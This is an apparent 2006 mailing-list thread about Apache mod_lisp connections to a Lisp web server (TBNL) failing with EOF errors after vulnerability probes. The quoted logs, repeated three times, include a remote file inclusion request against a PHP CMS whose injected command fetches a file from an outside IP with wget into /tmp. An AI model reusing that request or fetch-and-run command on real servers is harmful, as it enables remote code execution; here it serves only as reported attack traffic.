Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php POST /blogs/xmlsrv/xmlrpc.php GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Zach
Hi Zach!
On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane xach@xach.com wrote:
Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php POST /blogs/xmlsrv/xmlrpc.php GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Sorry for the loooooong delay. I'm /really/ busy... :)
Have you made any progress with this? I've tried to reproduce it (LWL and Apache 2) but everything worked fine. Which Lisp are you using?
ATM I don't really have an idea how to tackle this. Sometimes, when I was really desperate, I've hacked the mod_lisp C code to debug problems like this one, but that isn't fun. Actually, that was one of the reasons I wrote Hunchentoot...
I'm afraid I can't be more helpful right now.
Cheers, Edi.
On Fri, Apr 21, 2006 at 11:05:27PM +0200, Edi Weitz wrote:
Hi Zach!
On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane xach@xach.com wrote:
Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php POST /blogs/xmlsrv/xmlrpc.php GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Sorry for the loooooong delay. I'm /really/ busy... :)
Have you made any progress with this? I've tried to reproduce it (LWL and Apache 2) but everything worked fine. Which Lisp are you using?
I am using SBCL. I can't reproduce it either; it only seems to happen after that particular style of attack.
On the other hand, I recently announced a new toy (http://wigflip.com/saywhat/) and it got a few thousand visitors in a short period of time. Things wedged a few times in a completely different style, but again I am unable to reproduce, which makes troubleshooting very difficult.
ATM I don't really have an idea how to tackle this. Sometimes, when I was really desperate, I've hacked the mod_lisp C code to debug problems like this one, but that isn't fun. Actually, that was one of the reasons I wrote Hunchentoot...
I'm thinking of going in a similar direction.
Zach